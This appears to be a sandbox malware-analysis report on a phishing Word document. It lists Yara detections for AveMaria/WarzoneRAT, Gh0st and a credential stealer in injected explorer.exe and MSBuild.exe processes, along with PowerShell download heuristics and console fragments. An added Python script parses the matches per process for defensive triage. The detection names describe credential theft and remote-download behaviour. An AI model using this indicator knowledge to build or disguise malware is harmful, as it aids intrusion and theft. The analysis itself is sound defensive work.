          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Yara matches, one row per source (rule metadata is listed once, after the rows):

          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE, Matched rules: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, MALWARE_Win_WarzoneRAT, Windows_Trojan_AveMaria_31d2bce9, AveMaria_WarZone
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE, Matched rules: Codoso_Gh0st_2, Codoso_Gh0st_1, MAL_Envrial_Jan18_1, INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, MALWARE_Win_WarzoneRAT, Windows_Trojan_AveMaria_31d2bce9, AveMaria_WarZone
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE, Matched rules: Codoso_Gh0st_2, Codoso_Gh0st_1, MAL_Envrial_Jan18_1, INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, MALWARE_Win_WarzoneRAT, Windows_Trojan_AveMaria_31d2bce9, AveMaria_WarZone
          Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE, Matched rules: Codoso_Gh0st_1, INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, MALWARE_Win_WarzoneRAT, Windows_Trojan_AveMaria_31d2bce9
          Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE, Matched rules: Codoso_Gh0st_1, INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, MALWARE_Win_WarzoneRAT, Windows_Trojan_AveMaria_31d2bce9
          Source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rules: Codoso_Gh0st_1
          Source: 00000013.00000002.962831144.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rules: Suspicious_PowerShell_WebDownload_1
          Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_AveMaria_31d2bce9
          Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rules: Codoso_Gh0st_1, Windows_Trojan_AveMaria_31d2bce9
          Source: 00000004.00000002.916223647.00000000000BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rules: Suspicious_PowerShell_WebDownload_1
          Source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rules: Codoso_Gh0st_1
          Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rules: Suspicious_PowerShell_WebDownload_1, PowerShell_Susp_Parameter_Combo
          Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_AveMaria_31d2bce9
          Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rules: Codoso_Gh0st_1, Windows_Trojan_AveMaria_31d2bce9
          Source: 00000009.00000002.937256768.0000000001BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rules: Suspicious_PowerShell_WebDownload_1
          Source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rules: Codoso_Gh0st_1
          Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_AveMaria_31d2bce9
          Source: 00000004.00000002.916438854.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rules: Suspicious_PowerShell_WebDownload_1
          Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_AveMaria_31d2bce9
          Source: 00000013.00000002.961202850.000000000010E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rules: Suspicious_PowerShell_WebDownload_1
          Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rules: Suspicious_PowerShell_WebDownload_1, PowerShell_Susp_Parameter_Combo
          Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rules: Suspicious_PowerShell_WebDownload_1, PowerShell_Susp_Parameter_Combo
          Source: 00000009.00000002.936976360.00000000003D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rules: Suspicious_PowerShell_WebDownload_1
          Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rules: Codoso_Gh0st_1, Windows_Trojan_AveMaria_31d2bce9
          Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rules: Codoso_Gh0st_1, Windows_Trojan_AveMaria_31d2bce9
          Source: Process Memory Space: powershell.exe PID: 1312, type: MEMORYSTR, Matched rules: Suspicious_PowerShell_WebDownload_1
          Source: Process Memory Space: powershell.exe PID: 2072, type: MEMORYSTR, Matched rules: Suspicious_PowerShell_WebDownload_1

          Rule metadata:
          INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM: author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          MALWARE_Win_WarzoneRAT: author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Windows_Trojan_AveMaria_31d2bce9: reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          AveMaria_WarZone: Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Codoso_Gh0st_2: date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Codoso_Gh0st_1: date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          MAL_Envrial_Jan18_1: date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Suspicious_PowerShell_WebDownload_1: date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          PowerShell_Susp_Parameter_Combo: date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
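The Yara rows above are easier to act on once they are pivoted per process: the same dumps that match the four AveMaria/WarzoneRAT rules also match Codoso_Gh0st_1/2 and MAL_Envrial_Jan18_1, so a reader should separate rules that name a family from the generic ones before drawing conclusions. The script below is an added example, not part of this Joe Sandbox report or of any Joe Sandbox tooling. It parses rows in the form the report uses ("Source: ..., type: ...Matched rule: ..."), groups rules per source, and links dump names to a process. The link is inferred from the rows themselves (the hex first field of an .sdmp name equals the decimal prefix of the .raw.unpack names: 0000001D = 29, 00000008 = 8); reading the fifth .sdmp field as a Win32 PAGE_* protection value is an assumption of this example, as is the set of rules treated as family-specific. The sample input is a handful of rows copied from this report.

```python
"""Pivot Joe Sandbox Yara rows per source and per process (added example)."""
import re
from collections import defaultdict

# Row as it appears in the report text; the separator between the "type" cell
# and "Matched rule:" may be ", " or missing entirely in extracted text.
ROW_RE = re.compile(
    r"Source:\s*(?P<source>.+?),\s*type:\s*(?P<type>[A-Z]+),?\s*"
    r"Matched rule:\s*(?P<rule>\S+)"
)
# <proc>.<snapshot>.<image>.<addr>.<n>.raw.unpack, e.g. 29.2.explorer.exe.28dd604.1.raw.unpack
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<snap>\d+)\.(?P<image>.+?)\.(?P<addr>[0-9a-fA-F]+)\.\d+\.raw\.unpack$"
)
# <proc hex>.<snapshot hex>.<timestamp>.<base>.<protect>.....sdmp
# Field meanings beyond proc/snapshot/base are an ASSUMPTION of this example.
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<snap>[0-9A-Fa-f]{8})\.\d+\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
)
PAGE_EXECUTE_READWRITE = 0x40  # Win32 memoryapi.h constant

# Rules whose name identifies a family; everything else is treated as generic.
FAMILY_RULES = {
    "Windows_Trojan_AveMaria_31d2bce9": "AveMaria/WarzoneRAT",
    "MALWARE_Win_WarzoneRAT": "AveMaria/WarzoneRAT",
    "AveMaria_WarZone": "AveMaria/WarzoneRAT",
}


def parse_rows(text):
    """Yield (source, type, rule) for every Yara row found in the text."""
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if m:
            yield m.group("source"), m.group("type"), m.group("rule")


def locate(source):
    """Map a Source cell to its process index and region, or None if unknown."""
    m = UNPACK_RE.match(source)
    if m:
        return {"proc": int(m.group("proc")), "image": m.group("image"),
                "base": int(m.group("addr"), 16), "protect": None}
    m = SDMP_RE.match(source)
    if m:
        return {"proc": int(m.group("proc"), 16), "image": None,
                "base": int(m.group("base"), 16),
                "protect": int(m.group("protect"), 16)}
    return None  # e.g. "Process Memory Space: powershell.exe PID: 1312"


def summarize(text):
    """Return (rules per source, per-process roll-up with family and RWX counts)."""
    per_source = defaultdict(set)
    for source, _type, rule in parse_rows(text):
        per_source[source].add(rule)
    per_process = defaultdict(
        lambda: {"images": set(), "families": set(), "rwx_hits": 0, "sources": 0})
    for source, rules in per_source.items():
        loc = locate(source)
        if loc is None:
            continue
        entry = per_process[loc["proc"]]
        entry["sources"] += 1
        if loc["image"]:
            entry["images"].add(loc["image"])
        entry["families"].update(FAMILY_RULES[r] for r in rules if r in FAMILY_RULES)
        if loc["protect"] is not None and loc["protect"] & PAGE_EXECUTE_READWRITE:
            entry["rwx_hits"] += 1  # executable+writable region: injected code candidate
    return dict(per_source), dict(per_process)


# Constructed input: rows copied from this report (metadata truncated).
SAMPLE = """\
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca3
Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca3
Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca3
Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22
Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12
Source: Process Memory Space: powershell.exe PID: 1312, type: MEMORYSTRMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22
"""

if __name__ == "__main__":
    _, per_process = summarize(SAMPLE)
    for proc, info in sorted(per_process.items()):
        print(f"process {proc}: images={sorted(info['images'])} "
              f"families={sorted(info['families'])} rwx_regions={info['rwx_hits']} "
              f"sources={info['sources']}")
```

Run against the full report text, the roll-up shows which process indices carry family-specific hits (here 29 and 8, both explorer.exe, and 0x11) and where the PAGE_EXECUTE_READWRITE regions are, which is the short list of dumps worth pulling for manual unpacking; the PowerShell-only processes (4, 9, 0x13) match nothing beyond the download/parameter heuristics.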
          Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.LNK.0.dr, LNK file: ..\..\..\..\..\Desktop\Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\Desktop\~$em Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
          Source: classification engine, Classification label: mal100.phis.troj.expl.evad.winDOC@43/31@2/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File read: C:\Users\desktop.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File created: C:\Program Files\Microsoft DN1
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: *.sln
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: MSBuild MyApp.csproj /t:Clean
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: /ignoreprojectextensions:.sln
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
          Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr, OLE document summary: title field not present or empty
          Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr, OLE document summary: author field not present or empty
          Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr, OLE document summary: edited time not present or 0
          Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, ReversingLabs: Detection: 32%
          Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, Virustotal: Detection: 50%
          Source: C:\Users\user\AppData\Roaming\explorer.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: 16 writes of mostly non-printable data; the readable UTF-16 fragments are "uring a WebClient request."" (the tail of the .NET error text "An exception occurred during a WebClient request.") and the PowerShell position line "At line:1 char:47"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Console Write: 20 writes of mostly non-printable data; the readable UTF-16 fragments are the position line "At line:1 char:17", a file-name fragment "uy.exe" and "mmandNotFoundException" (the tail of a PowerShell CommandNotFoundException error)
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.....................h......./_................................................................).....
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.........=.......r.....p.........r.......m.....`Io.......bw.....................Kv.....................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............M.Xk....p|..............................}.dw.....|......0.A..............#d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...(.......0.A.............."d.....6.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............M.Xk....................................}.dw....`.......0.A..............#d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw....p.......0.A.............."d.....".......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............M.Xk....(...............................}.dw............0.A..............#d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................Xk....@&d.............................}.dw....p.......0.A.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............M.Xk....(...............................}.dw............0.A..............#d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................Xk....@&d.............................}.dw....`.......0.A.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............M.Xk....................................}.dw............0.A..............#d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................Xk....@&d.............................}.dw....X.......0.A.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............M.Xk....................................}.dw............0.A..............#d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................Xk....@&d.............................}.dw............0.A.....................f.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............M.Xk....................................}.dw............0.A..............#d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.......w....... .........Xk....@&d.............................}.dw............0.A.............."d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............M.Xk....H...............................}.dw............0.A..............#d.............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................+v......................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................Uv......................0.......#.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P..............................v......................0......./.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P..............................v......................0......./.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................l........v......................0.......;...............|.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................l........v......................0.......;.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........w......................0.......G.......h.......".......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................l.......0w......................0.......G.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................l.......[w......................0.......S.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................l........w......................0.......S.......h...............................
